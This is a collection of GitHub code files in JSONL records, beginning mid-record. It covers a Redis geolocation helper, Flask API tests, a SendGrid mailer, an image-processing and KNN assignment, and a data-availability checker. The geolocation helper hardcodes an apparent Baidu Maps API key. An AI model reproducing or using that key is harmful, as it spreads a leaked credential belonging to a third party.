)\n","repo_name":"MrPowers/quinn","sub_path":"tests/test_transformations.py","file_name":"test_transformations.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","stars":534,"dataset":"github-code","pt":"37"}
+{"seq_id":"37753230834","text":"import struct\nimport datetime\nfrom django_redis import get_redis_connection\nimport os,django\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"meet.settings\")# project name\ndjango.setup()\n\nimport requests\n\n\ndef locatebyLatLng(lat, lng, pois=0):\n '''\n Look up a human-readable address for the given latitude and longitude\n '''\n items = {'location': str(lat) + ',' + str(lng), 'ak': 'XhDg0CerOl020ANVfHnl6aaXs4o47Au9', 'output':
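# 'ak' above is the caller's Baidu Maps API key; 'output' asks the geocoder for a JSON response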
'json'}\n res = requests.get('http://api.map.baidu.com/geocoder/v2/', params=items)\n result = res.json()\n # print(result)\n # print('--------------------------------------------')\n #result = result['result']['formatted_address'] + ',' + result['result']['sematic_description']\n # result_site = result['result']['addressComponent']['city']\n result_s = result['result']['formatted_address']\n\n return result_s\n\n\n\nconn = get_redis_connection('default')\n\nx = locatebyLatLng(lat=123, lng=23)\n\n\ndef geoadd(lng, lat, sites):\n\n add_site = conn.geoadd('site', lng, lat, sites) # add a location entry\n return 'added successfully'\n# print(geoadd('116.28000233597092', '39.6679994936725', 'buzhidao'))\n\n\ndef geopos( site2):\n user_msg = conn.geopos('site', site2) #show the stored coordinates for the given member\n return user_msg\n# print(geopos( 'beijing'))\n\n\ndef geodist(site1, site2):\n user_distance = conn.geodist('site', site1, site2, 'm') # compute the distance between two places\n return user_distance\n# print(geodist('chengdu', 'beijing'))\n\n\ndef georadiusbymember(condition, num):\n user_radius = conn.georadiusbymember('site', condition, num, 'm', 'withdist') # compute distances for members within the given radius\n for i in user_radius:\n print(i[0].decode())\n return user_radius\n\n# x = georadiusbymember('北京市大兴区魏永路', 100)\n# print(x)\n\n\n# name = str(input('Please enter your name: '))\n# birth_day = int(input('Please enter your birth date: '))\n# age = datetime.date.today().month\n# print(age)\n\n\n","repo_name":"hexiaowanmei/meet","sub_path":"homepage/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70929263467","text":"import secrets\nimport time\n\nfrom base64 import b64encode\nfrom datetime import datetime\n\nfrom flask_testing import TestCase\n\nfrom sip_api.app import app, db\nfrom sip_api.models import Call, Operator, User\nfrom sip_api.lib import const as c\n\n\nclass TestBase(TestCase):\n\n def create_app(self):\n return app\n\n def setUp(self):\n db.create_all()\n User(login='test', password='test', token='test').save()\n self.headers = {\n 'Authorization': 'Bearer test'\n }\n self._setTestData()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n\n def _setTestData(self):\n pass\n\n\nclass TestHealthCheck(TestBase):\n def test_health_check(self):\n response = self.client.get('/api/v1/health-check')\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.data, b'OK')\n\n\nclass TestAuth(TestBase):\n def test_auth(self):\n headers = {\n 'Authorization': 'Basic ' + b64encode(bytes(\"test:test\", 'ascii')).decode('ascii')\n }\n response = self.client.get(\"/users\", headers=headers)\n self.assertEqual(response.status_code, 200)\n self.assertIsNotNone(response.json['token'])\n\n\nclass TestGetEmptyOperatorList(TestBase):\n def test_get_operators(self):\n response = self.client.get('/api/v1/operators', headers=self.headers)\n self.assertEqual(response.status_code, 200)\n\n operators = response.json['operators']\n self.assertEqual(len(operators), 0)\n\n\nclass TestGetOperatorList(TestBase):\n def _setTestData(self):\n for i in range(0, 10):\n Operator(phone_number=f'92{i}', name=f'operator_{i}').save()\n\n def test_get_operators(self):\n response = self.client.get('/api/v1/operators', headers=self.headers)\n self.assertEqual(response.status_code, 200)\n\n operators = response.json['operators']\n self.assertEqual(len(operators), 10)\n for i in range(0, 10):\n self.assertEqual(operators[i]['phone_number'], f'92{i}')\n self.assertEqual(operators[i]['name'],
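# the expected names follow the operator_0..operator_9 seed data created in _setTestData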
f'operator_{i}')\n\n\nclass TestGetEmptyCallList(TestBase):\n def test_get_calls(self):\n response = self.client.get('/api/v1/calls', headers=self.headers)\n self.assertEqual(response.status_code, 200)\n\n calls = response.json['calls']\n self.assertEqual(len(calls), 0)\n\n\nclass TestGetCallList(TestBase):\n def _setTestData(self):\n for i in range(0, 10):\n operator = Operator(phone_number=f'92{i}', name=f'operator_{i}').save()\n Call(\n id=secrets.token_hex(nbytes=16),\n type=c.CALL_TYPES['OUTGOING'],\n date=int(time.mktime(datetime.now().replace(hour=i).timetuple())),\n duration_answer=5,\n status=c.CALL_STATUSES['ACCEPTED'],\n phone_number_client='88005553535',\n phone_number_operator=operator.phone_number\n ).save()\n\n def test_get_calls(self):\n response = self.client.get('/api/v1/calls', headers=self.headers)\n self.assertEqual(response.status_code, 200)\n\n calls = response.json['calls']\n self.assertEqual(len(calls), 10)\n\n for i in range(0, 10):\n self.assertEqual(calls[i]['phone_number_operator'], f'92{i}')\n\n def test_get_call_with_params(self):\n date_from = int(time.mktime(datetime.now().replace(hour=0, minute=0).timetuple()))\n date_till = int(time.mktime(datetime.now().replace(hour=5, minute=0).timetuple()))\n response = self.client.get(f'/api/v1/calls?date_from={date_from}&date_till={date_till}',\n headers=self.headers)\n\n self.assertEqual(response.status_code, 200)\n\n calls = response.json['calls']\n self.assertEqual(len(calls), 5)\n\n def test_get_empty_call_list(self):\n date_from = int(time.mktime(datetime.now().replace(hour=12).timetuple()))\n date_till = int(time.mktime(datetime.now().replace(hour=23, minute=59).timetuple()))\n\n response = self.client.get(f'/api/v1/calls?date_from={date_from}&date_till={date_till}',\n headers=self.headers)\n self.assertEqual(response.status_code, 200)\n\n calls = response.json['calls']\n self.assertEqual(len(calls), 0)\n\n\nclass TestRecording(TestBase):\n def _setTestData(self):\n for i in range(0, 1):\n operator = Operator(phone_number=f'92{i}', name=f'operator_{i}').save()\n Call(\n id=i,\n type=c.CALL_TYPES['OUTGOING'],\n date=int(time.mktime(datetime.now().replace(hour=i).timetuple())),\n duration_answer=5,\n status=c.CALL_STATUSES['ACCEPTED'],\n phone_number_client='88005553535',\n phone_number_operator=operator.phone_number\n ).save()\n\n def test_get_recording_success(self):\n response = self.client.get('/api/v1/recording?call_id=0', headers=self.headers)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.content_type, 'audio/wav')\n self.assertIsNotNone(response.data)\n\n def test_get_recording(self):\n response = self.client.get('/api/v1/recording?call_id=test', headers=self.headers)\n self.assertEqual(response.status_code, 400)\n","repo_name":"awekening2/sip_api","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70814948906","text":"#!/usr/bin/env python\n\n# Convert the format of the EWK cross sections in the twiki to the limit code input format.\n\nimport os,sys\nfrom string import *\n\nfin = 'c1n2_xsecs_13TeV_raw.txt'\nfout = open('c1n2_xsecs_13TeV.txt', 'w')\n\nxsecs = open(fin).readlines()\n\nfor x in xsecs:\n x = split(strip(x))\n mass = x[0]\n xsec = atof(x[1]) / 1000.\n xsecerr = atof(x[2]) / atof(x[1]) * 100\n point = '%s %.4e %.2f \\n' % (mass, xsec, xsecerr) \n 
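# each output row is: mass, the cross section (input value divided by 1000) in scientific notation, and the relative uncertainty in percent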
fout.write(point)\n","repo_name":"ssekmen/razorlimits","sub_path":"convertxsec_ewk.py","file_name":"convertxsec_ewk.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"25585279458","text":"#import os\n#import re\nimport time\nimport logging\n\nfrom RuckusAutoTest.models import Test\n#from RuckusAutoTest.components.ZoneDirector import ZoneDirector\nfrom RuckusAutoTest.components.lib.zd import redundancy_zd\n#from RuckusAutoTest.components import Helper_ZD as zhlp\nimport RuckusAutoTest.common.lib_Debug as bugme \n\nclass CB_ZD_SR_Enable_Wrong_Peer_IP(Test):\n \n def config(self, conf):\n self._cfgInitTestParams(conf)\n \n def test(self):\n self.test_wrong_peer_ip()\n if self.errmsg:\n return self.returnResult('FAIL', self.errmsg)\n msg = 'The ZDs can NOT become a Smart Redundancy pair when using a wrong peer IP address'\n return self.returnResult('PASS', msg)\n \n def cleanup(self):\n pass\n\n \n def _cfgInitTestParams(self, conf):\n self.errmsg = ''\n self.zd1 = self.carrierbag['zd1']\n self.zd2 = self.carrierbag['zd2']\n self.share_secret = self.carrierbag['share_secret'] \n self.ip_addr = conf['ip_addr']\n \n def test_wrong_peer_ip(self):\n pause = 5\n timeout = 30\n redundancy_zd.enable_single_smart_redundancy(self.zd1, self.ip_addr, self.share_secret) \n redundancy_zd.enable_single_smart_redundancy(self.zd2, self.ip_addr, self.share_secret)\n start_time = time.time()\n while True:\n if redundancy_zd.get_peer_device_state(self.zd1) == 'disconnected':\n if redundancy_zd.get_peer_device_state(self.zd2) == 'disconnected':\n logging.info(\"Correct behavior: the peer is disconnected, so the ZDs did not form a smart redundancy pair\")\n break\n elif redundancy_zd.get_peer_device_state(self.zd1).find('mismatched') != -1: # str.find() returns -1 when absent, so compare explicitly\n logging.info(\"Correct behavior: the peer IP is mismatched, so the ZDs did not form a smart redundancy pair\")\n break\n elif redundancy_zd.get_local_device_state(self.zd1) == 'active':\n if redundancy_zd.get_local_device_state(self.zd2) =='standby': \n self.errmsg = 'Incorrect behavior -- Enable smart redundancy successfully, and the ZD1 %s is the active ZD' % self.zd1.ip_addr\n return self.errmsg\n \n elif redundancy_zd.get_local_device_state(self.zd1) =='standby': \n if redundancy_zd.get_local_device_state(self.zd2) =='active':\n self.errmsg = 'Incorrect behavior -- Enable smart redundancy successfully, and the ZD2 %s is the active ZD' % self.zd2.ip_addr\n return self.errmsg\n else:\n time.sleep(pause)\n \n if time.time() - start_time > timeout:\n logging.info(\"The 2 ZDs were not paired via smart redundancy after %d seconds\", timeout)\n break\n \n \n \n","repo_name":"jichunwei/MyGitHub-1","sub_path":"saigon/rat/RuckusAutoTest/tests/zd/CB_ZD_SR_Enable_Wrong_Peer_IP.py","file_name":"CB_ZD_SR_Enable_Wrong_Peer_IP.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"7054474711","text":"import datetime\nimport logging\nfrom dataclasses import asdict\nfrom typing import Any\n\nfrom clients.sendgrid import get_sendgrid_client\nfrom models.subscribed_users import SubscribedUser\nfrom sendgrid import From, Mail, Personalization, To\nfrom templates import EMAIL_JINJA_ENVIRONMENT, TemplateContext\nfrom utils.timedelta import format_timedelta\n\n_logger = logging.getLogger(__name__)\n\n\ndef send_email(\n to_user: SubscribedUser,\n subject: str,\n template_name: str,\n should_include_unsubscribe_button: bool =
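# template flag; when False the rendered email is expected to omit the unsubscribe button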
True,\n extra_jinja_context: dict[str, Any] | None = None,\n):\n _logger.info(f\"Sending a {template_name} email to {to_user.user_email}...\")\n now = datetime.datetime.utcnow()\n subscription_duration = now.replace(tzinfo=None) - to_user.date_created.replace(tzinfo=None)\n\n context = TemplateContext(\n generated_at=now.strftime(\"%d %b, %Y at %H:%M\"),\n should_include_unsubscribe_button=should_include_unsubscribe_button,\n should_include_user_metadata=True,\n user_email=to_user.user_email,\n subscription_duration=format_timedelta(subscription_duration),\n )\n full_context = asdict(context)\n if extra_jinja_context:\n full_context.update(extra_jinja_context)\n email_content = EMAIL_JINJA_ENVIRONMENT.get_template(template_name).render(full_context)\n\n from_sender = From(\"backend@axleos.com\", \"axleOS.com backend\")\n message = Mail(\n from_email=from_sender,\n subject=subject,\n html_content=email_content,\n )\n personalization = Personalization()\n personalization.add_to(To(to_user.user_email))\n message.add_personalization(personalization)\n\n sendgrid_client = get_sendgrid_client()\n sendgrid_response = sendgrid_client.send(message)\n _logger.info(f\"Response from SendGrid: {sendgrid_response.status_code} {sendgrid_response.body}\")\n","repo_name":"codyd51/axleos-blog-newsletter","sub_path":"newsletter/utils/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71249831786","text":"import numpy as np\r\nfrom PIL import Image\r\n\r\n\r\n# RGB Image #\r\nclass RGBImage:\r\n \"\"\"\r\n The class RGBImage contains a constructor and many class\r\n functions as a template for image objects in RGB color spaces\r\n \"\"\"\r\n\r\n def __init__(self, pixels):\r\n \"\"\"\r\n This constructor takes in two arguments: self and pixels.\r\n The function checks if there are any exceptions in the input\r\n and initializes pixels to a 3D list, num_row to the amount of \r\n rows in the list and num_cols to the number of columns in the \r\n list\r\n \"\"\"\r\n\r\n if type(pixels) != list or len(pixels) == 0:\r\n raise TypeError()\r\n\r\n for row in pixels:\r\n for col in row:\r\n if type(row) != list or len(row) == 0:\r\n raise TypeError()\r\n if len(row) != len(pixels[0]):\r\n raise TypeError()\r\n if type(col) != list or len(col) != 3:\r\n raise TypeError()\r\n\r\n for row in pixels:\r\n for col in row:\r\n for num in col:\r\n if num < 0 or num > 255 or type(num) != int:\r\n raise ValueError()\r\n\r\n self.pixels = pixels\r\n self.num_rows = len(pixels)\r\n self.num_cols = len(pixels[0])\r\n\r\n def size(self):\r\n \"\"\"\r\n This function is a getter method, taking in the argument: self.\r\n The function uses self to return a tuple containing the number \r\n of rows and number of columns.\r\n \"\"\"\r\n return (self.num_rows, self.num_cols)\r\n\r\n def get_pixels(self):\r\n \"\"\"\r\n This function takes in one argument: self and uses self to\r\n get the corresponding pixels list. The function then returns a \r\n deep copy of the list.\r\n \"\"\"\r\n return [[list(inlist) for inlist in lst] for lst in self.pixels]\r\n\r\n\r\n def copy(self):\r\n \"\"\"\r\n This function takes in one argument: self and returns a deep\r\n copy using the helper function get_pixels above.\r\n \"\"\"\r\n return RGBImage.get_pixels(self)\r\n\r\n def get_pixel(self, row, col):\r\n \"\"\"\r\n This function takes in three arguments: self, row and col. 
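A doctest-style sketch (this 1x2 image is made up for illustration):\r\n\r\n >>> RGBImage([[[255, 0, 0], [0, 255, 0]]]).get_pixel(0, 1)\r\n (0, 255, 0)\r\n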
The \r\n function returns a tuple containing three color values representing\r\n a pixel at the position row, col. If the input is invalid, the \r\n function will raise an error.\r\n \"\"\"\r\n \r\n if type(row) != int or type(col) != int:\r\n raise TypeError()\r\n\r\n try:\r\n return tuple(self.pixels[row][col])\r\n except IndexError:\r\n raise ValueError()\r\n\r\n\r\n def set_pixel(self, row, col, new_color):\r\n \"\"\"\r\n This function takes in four arguments: self, row, col, and new\r\n color. The function updates the color of the pixel at the postion\r\n row, col. If there is an invalid input, the function will raise\r\n a TypeError() or ValueError(). This function returns None.\r\n \"\"\"\r\n\r\n if type(row) != int or type(col) != int:\r\n raise TypeError()\r\n if new_color[0] > 255 or new_color[1] > 255 or new_color[2] > 255:\r\n raise ValueError()\r\n if type(new_color) != tuple or len(new_color) != 3:\r\n raise TypeError()\r\n if all(map(lambda num: type(num) == int, new_color)) == False:\r\n raise TypeError()\r\n\r\n for i in range(len(new_color)):\r\n if new_color[i] >= 0:\r\n self.pixels[row][col][i] = new_color[i]\r\n\r\n\r\n# Image Processing Template Methods #\r\nclass ImageProcessingTemplate:\r\n \"\"\"\r\n The class RGBImage contains a constructor and many class\r\n functions as a template for altering pixel matrices and \r\n calculating incurred costs by customers. \r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"\r\n This constructor initializes the instance cost to zero by \r\n default. The variable cost tracks the total incurred cost \r\n of self. \r\n \"\"\"\r\n self.cost = 0\r\n\r\n def get_cost(self):\r\n \"\"\"\r\n This function is a getter method that returns the current\r\n total incurred cost of self. \r\n \"\"\"\r\n return self.cost\r\n\r\n def negate(self, image):\r\n \"\"\"\r\n This function takes in two arguments: self and image. The function\r\n inverts the image given by the argument by subtracting each pixel\r\n value by 255.\r\n \"\"\"\r\n return RGBImage([[[255 - value for value in lst2] for lst2 in lst1] \\\r\n for lst1 in image.pixels])\r\n\r\n\r\n def grayscale(self, image):\r\n \"\"\"\r\n This function takes in two arguments: self and image. The function\r\n converts the image given in the argument into grayscale by taking the\r\n average of the pixels matrix.\r\n \"\"\"\r\n return RGBImage([[[sum(lst2)//3 for value in lst2] for lst2 in lst1] \\\r\n for lst1 in image.pixels])\r\n\r\n\r\n def rotate_180(self, image):\r\n \"\"\"\r\n This function takes in two arguments: self and image. The function\r\n rotates the image given in the argument by 180 degrees. \r\n \"\"\"\r\n r1 = image.get_pixels()[::-1]\r\n return RGBImage([col[::-1] for col in r1])\r\n\r\n\r\n# Standard Image Processing Methods #\r\nclass StandardImageProcessing(ImageProcessingTemplate):\r\n \"\"\"\r\n The class creates a money version of the template class, the class\r\n utilizes variables such as cost and coupouns to keep track of cost\r\n or use coupouns. Everytime a method has been called or used it \r\n increments the cost variable.\r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"\r\n This constructor initializes a cost instance to 0 by default \r\n which will track the total cost incurred by the user.\r\n \"\"\"\r\n self.cost = 0\r\n self.coupons = 0\r\n self.rotations = 0\r\n\r\n def negate(self, image):\r\n \"\"\"\r\n This function takes in two arguments: self and image. 
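(E.g., a channel value of 10 inverts to 245, since 255 - 10 = 245.)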
Whenever \r\n this function is called, the function will add $5 dollars to the \r\n instance cost and return the inverted image using the class:\r\n ImageProcessingTemplate.\r\n \"\"\"\r\n self.cost += 5\r\n return ImageProcessingTemplate.negate(self, image)\r\n\r\n def grayscale(self, image):\r\n \"\"\"\r\n This function takes in two arguments: self and image. Whenever \r\n this function is called, the function will add 6 dollars to the \r\n instance cost and return the grayscaled image using the class:\r\n ImageProcessingTemplate.\r\n \"\"\"\r\n self.cost += 6\r\n return ImageProcessingTemplate.grayscale(self, image)\r\n\r\n\r\n def rotate_180(self, image):\r\n \"\"\"\r\n This function takes in an input of the image and rotates the image to \r\n user's liking and increments the cost by 10 everytime ran. This \r\n function uses inheritance.\r\n \"\"\"\r\n self.rotations += 1\r\n\r\n if self.rotations % 2 != 0:\r\n if self.coupons > 0:\r\n self.coupons -= 1\r\n return super().rotate_180(image)\r\n else:\r\n self.cost += 10\r\n return super().rotate_180(image)\r\n elif self.rotations % 2 == 0:\r\n if self.coupons > 0:\r\n self.coupons -= 1\r\n else:\r\n self.cost -= 10\r\n\r\n\r\n def redeem_coupon(self, amount):\r\n \"\"\"\r\n The function takes in one input and reduces the cost\r\n by the amount of times the method is called (tracks how many\r\n times the method is called).\r\n \"\"\"\r\n if amount <= 0:\r\n raise ValueError()\r\n if type(amount) != int:\r\n raise TypeError()\r\n\r\n self.coupons += amount\r\n\r\n\r\n# Part 4: Premium Image Processing Methods #\r\nclass PremiumImageProcessing(ImageProcessingTemplate):\r\n \"\"\"\r\n This class has two methods of chroma_ley and sticker\r\n and is the premium version of the app, where it automatically\r\n increses the cost of the app to be $50 dollars.\r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Constructor of the class that intializes the variable\r\n cost to be $50.\r\n \"\"\"\r\n self.cost = 50\r\n\r\n def chroma_key(self, chroma_image, background_image, color):\r\n \"\"\"\r\n This function takes in 3 inputs and changes the chroma background\r\n of the image. It checks if the types and instances of the inputs\r\n are valid or not by raising errors, if they are invalid. 
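A usage sketch (the image variables and the pure-green key color are illustrative):\r\n\r\n premium = PremiumImageProcessing()\r\n keyed = premium.chroma_key(chroma_img, background_img, (0, 255, 0))\r\n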
\r\n \"\"\"\r\n\r\n if not isinstance(chroma_image, RGBImage) or not \\\r\n isinstance(background_image, RGBImage):\r\n raise TypeError()\r\n\r\n if len(chroma_image.pixels) != len(background_image.pixels):\r\n raise ValueError()\r\n\r\n chroma = list(chroma_image.pixels)\r\n\r\n for lst in chroma_image.pixels:\r\n row = chroma_image.pixels.index(lst)\r\n for pix in lst:\r\n if pix == list(color):\r\n col = lst.index(pix)\r\n chroma[row][col] = background_image.pixels[row][col]\r\n\r\n return RGBImage(chroma)\r\n\r\n\r\n def sticker(self, sticker_image, background_image, x_pos, y_pos):\r\n \"\"\"\r\n The function takes in 4 inputs and checks if each input is valid, by\r\n raising errors if the input is invalid, it then places a sticker onto\r\n the image by creating a new image.\r\n \"\"\"\r\n sticker_rows = len(sticker_image.pixels)\r\n sticker_cols = len(sticker_image.pixels[0])\r\n background_rows = len(background_image.pixels)\r\n background_cols = len(background_image.pixels[0])\r\n\r\n if not isinstance(sticker_image, RGBImage) or not \\\r\n isinstance(background_image, RGBImage):\r\n raise TypeError()\r\n\r\n if type(x_pos) != int or type(y_pos) != int:\r\n raise ValueError()\r\n\r\n if sticker_rows >= background_rows or sticker_cols >= \\\r\n background_cols:\r\n raise ValueError()\r\n\r\n if background_rows < y_pos + sticker_rows or background_cols < \\\r\n x_pos + sticker_cols:\r\n raise ValueError()\r\n\r\n background = list(background_image.pixels)\r\n\r\n for row in range(y_pos, y_pos + sticker_rows):\r\n for col in range(x_pos, x_pos + sticker_cols):\r\n background[row][col] = sticker_image.pixels \\\r\n [row-y_pos][col-x_pos]\r\n\r\n return RGBImage(background)\r\n\r\n\r\n# Part 5: Image KNN Classifier #\r\nclass ImageKNNClassifier:\r\n \"\"\"\r\n The class implements machine learning type features\r\n by checking image data to see how freqeuent and revelant it is\r\n \"\"\"\r\n\r\n def __init__(self, n_neighbors):\r\n \"\"\"\r\n The function intializes variable n_neigbhors\r\n \"\"\"\r\n self.n_neighbors = n_neighbors\r\n\r\n def fit(self, data):\r\n \"\"\"\r\n The function takes in an input of data and sets \r\n the value of data into self.data\r\n \"\"\"\r\n if len(data) <= self.n_neighbors:\r\n raise ValueError()\r\n if self.data:\r\n raise ValueError()\r\n\r\n self.data = data\r\n\r\n @staticmethod\r\n def distance(image1, image2):\r\n \"\"\"\r\n The function takes in two inputs and caculates\r\n the Euclidean distance of both inputs, and checks\r\n if the both inputs are RBGImage by raising errors if they are\r\n not\r\n \"\"\" \r\n if not isinstance(image1, RGBImage) or not isinstance(image2, \\\r\n RGBImage):\r\n raise TypeError()\r\n\r\n if len(image1.pixels) != len(image2.pixels):\r\n raise ValueError()\r\n\r\n p1 = image1.get_pixels()\r\n p2 = image2.get_pixels()\r\n\r\n return sum([(p1[row][col][chan] - p2[row][col][chan])**2 \\\r\n for row in range(len(p1)) \\\r\n for col in range(len(p1[row])) \\\r\n for chan in range(len(p1[row][col]))]) ** (1/2)\r\n\r\n\r\n @staticmethod\r\n def vote(candidates):\r\n \"\"\"\r\n The function finds the most viewed or popular label and \r\n returns it. 
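For example, vote([\"dog\", \"cat\", \"dog\"]) returns \"dog\", the most frequent label.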
In case of a tie, any one of them is returned.\r\n \"\"\"\r\n counter = 0\r\n popular = candidates[0]\r\n\r\n for candidate in candidates:\r\n frequency = candidates.count(candidate)\r\n if frequency > counter:\r\n counter = frequency\r\n popular = candidate\r\n\r\n return popular\r\n\r\n def predict(self, image):\r\n \"\"\"\r\n The function gives a guess using the vote method \r\n for the neighbors\r\n \"\"\"\r\n if getattr(self, 'data', None) is None:\r\n raise ValueError('fit() must be called before predict()')\r\n\r\n distance = [(ImageKNNClassifier.distance(image, tup[0]), tup[1]) \\\r\n for tup in self.data]\r\n\r\n sort = sorted(distance, key=lambda x: x[0], \\\r\n reverse=False)[:self.n_neighbors]\r\n\r\n cand_list = [tup[1] for tup in sort]\r\n\r\n return ImageKNNClassifier.vote(cand_list)\r\n\r\n\r\ndef img_read_helper(path):\r\n img = Image.open(path).convert(\"RGB\")\r\n matrix = np.array(img).tolist()\r\n return RGBImage(matrix)\r\n\r\n\r\ndef img_save_helper(path, image):\r\n img_array = np.array(image.get_pixels())\r\n img = Image.fromarray(img_array.astype(np.uint8))\r\n img.save(path)\r\n\r\n\r\ndef create_random_pixels(low, high, nrows, ncols):\r\n return np.random.randint(low, high + 1, (nrows, ncols, 3)).tolist()","repo_name":"jeh027/Image-Processing-Project","sub_path":"Image Processing Project.py","file_name":"Image Processing Project.py","file_ext":"py","file_size_in_byte":13388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"72988780907","text":"\"\"\"\ntools for checking the availability of distributions described in a NIST bag.\n\"\"\"\nimport os, re\nfrom collections.abc import Mapping\n\nimport multibag as mb\nimport requests\n\nfrom .utils import parse_bag_name\nfrom ...exceptions import ConfigurationException, StateException\nfrom ...distrib import (RESTServiceClient, BagDistribClient, DistribServerError,\n DistribServiceException, DistribResourceNotFound)\n\nclass DataChecker(object):\n \"\"\"\n a class that will run checks to ensure all data distributions are accounted\n for and available.\n\n A distribution that is listed as a downloadable component in the NERDm \n metadata must be available from one of the following sources:\n 1) under the bag's data payload directory (at the location given by \n the component's filepath property)\n 2) from the URL given by the downloadURL property (tested via a HEAD request)\n 3) in a multibag member bag as indicated in the multibag/file-lookup.tsv \n file found in either,\n a) a cached copy of the specified member bag\n b) in a remote copy of the specified member bag available via the \n distribution service.\n \"\"\"\n\n AVAIL_NOT = \"not available\"\n AVAIL_IN_BAG = \"available in current bag\"\n AVAIL_IN_CACHED_BAG = \"available in cached bag\"\n AVAIL_VIA_URL = \"available via download URL\"\n AVAIL_IN_REMOTE_BAG = \"available in remote bag via service\"\n\n def __init__(self, bag, config=None, log=None):\n \"\"\"\n initialize the checker around the bag to be checked\n \"\"\"\n self.bag = bag\n if not config:\n config = {}\n self.cfg = config\n self.log = log\n \n self._store = config.get('store_dir')\n self._mbag = mb.open_headbag(bag.dir)\n self._disturlpat = self.cfg.get('pdr_dist_url_pattern',\n r'^https?://[^/]+/od/ds/(.+)')\n try:\n self._disturlpat = re.compile(self._disturlpat)\n if self._disturlpat.groups < 1:\n raise ConfigurationException(\"pdr_dist_url_pattern: regex is \" +\n \"missing group to capture filepath: \"+\n self._disturlpat.pattern)\n except re.error as ex:\n raise
ConfigurationException(\"pdr_dist_url_pattern: regex does \" +\n \"not compile: \" + self._disturlpat)\n\n self._distsvc = None\n svcurl = self.cfg.get('repo_access',{}).get('distrib_service',{}) \\\n .get('service_endpoint')\n if svcurl:\n self._distsvc = RESTServiceClient(svcurl)\n\n def available_in_bag(self, cmp):\n \"\"\"\n return True if the specified data is found in the bag. \n\n The file can be specified either via its component metadata (as a \n dict) or directly by its filepath property (as a string). False is \n returned if either the filepath is not found in the bag or the filepath \n property is not included in the input metadata.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's filepath.\n \"\"\"\n if isinstance(cmp, Mapping):\n if 'filepath' not in cmp:\n return False\n cmp = cmp['filepath']\n\n path = os.path.join(self.bag.data_dir, cmp)\n return os.path.isfile(path)\n\n def bag_location(self, cmp):\n \"\"\"\n return the name of the member bag that contains specified the data file\n or None if a member bag is not specified.\n\n The file can be specified either via its component metadata (as a \n dict) or directly by its filepath property (as a string). None is \n returned if either the filepath is not found in the bag or the filepath \n property is not included in the input metadata.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's filepath.\n \"\"\"\n if isinstance(cmp, Mapping):\n if 'filepath' not in cmp:\n return None\n cmp = cmp['filepath']\n\n path = '/'.join(['data', cmp])\n return self._mbag.lookup_file(path)\n\n def located_here(self, cmp):\n \"\"\"\n return True if the the downloadable file should be located in the \n current bag.\n\n The file can be specified either via its component metadata (as a \n dict) or directly by its filepath property (as a string). False is \n returned if either the filepath is not found in the bag or the filepath \n property is not included in the input metadata.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's filepath.\n \"\"\"\n loc = self.bag_location(cmp)\n return loc == self.bag.name\n\n def available_in_cached_bag(self, cmp, inbag=None):\n \"\"\"\n return true if the specified data file can be found in a cached\n member bag.\n\n The file can be specified either via its component metadata (as a \n dict) or directly by its filepath property (as a string). False is \n returned if either the filepath is not found in a cached bag, if \n the location of the bag cache directory is not known, or if the \n filepath property is not included in the given component metadata.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's filepath.\n :param str inbag: the name of the bag that should contain the file. 
\n If None, this path will be looked up in the current bag's \n file lookup list.\n \"\"\"\n if isinstance(cmp, Mapping):\n if 'filepath' not in cmp:\n return False\n cmp = cmp['filepath']\n\n if not inbag:\n inbag = self.bag_location(cmp)\n if not inbag:\n return False\n\n locs = [ os.path.join(self._store, inbag) ]\n if not os.path.isdir(locs[0]):\n locs = [os.path.join(self._store, f) for f in os.listdir(self._store)\n if f.startswith(inbag+\".\")]\n if len(locs) == 0:\n return False\n\n for loc in locs:\n if not os.path.isfile(loc):\n continue\n try:\n mbag = mb.open_bag(loc)\n except Exception as ex:\n continue\n if mbag.isfile('/'.join(['data', cmp])):\n return True\n\n return False\n\n def has_pdr_url(self, cmp):\n \"\"\"\n return True if the specified data file is downloadable via the PDR's\n distribution service. \n\n The data file can either be specified via its component metadata (as a \n dict) or directly by its downloadURL property (as a string). False \n is returned if the property is not included in the component metadata\n or if the URL does not match the base associated with the distribution\n service.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's download URL.\n \"\"\"\n if isinstance(cmp, Mapping):\n if 'downloadURL' not in cmp:\n return False\n cmp = cmp['downloadURL']\n\n return bool(self._disturlpat.match(cmp))\n\n @classmethod\n def head_url(cls, url):\n \"\"\"\n make a HEAD request on the given URL and return the status code\n and associated message as a tuple. \n\n This raises a requests.RequestsException if a connection cannot be \n made.\n \"\"\"\n resp = None\n try:\n resp = requests.head(url, allow_redirects=True)\n return (resp.status_code, resp.reason)\n finally:\n if resp is not None:\n resp.close()\n \n\n def available_via_url(self, cmp):\n \"\"\"\n return True if the specified data file appears available via its \n download URL. A HEAD request is conducted on the download URL; True \n is returned if the request returns a 2XX status.\n\n The data file can either be specified via its component metadata (as a \n dict) or directly by its downloadURL property (as a string). False \n is 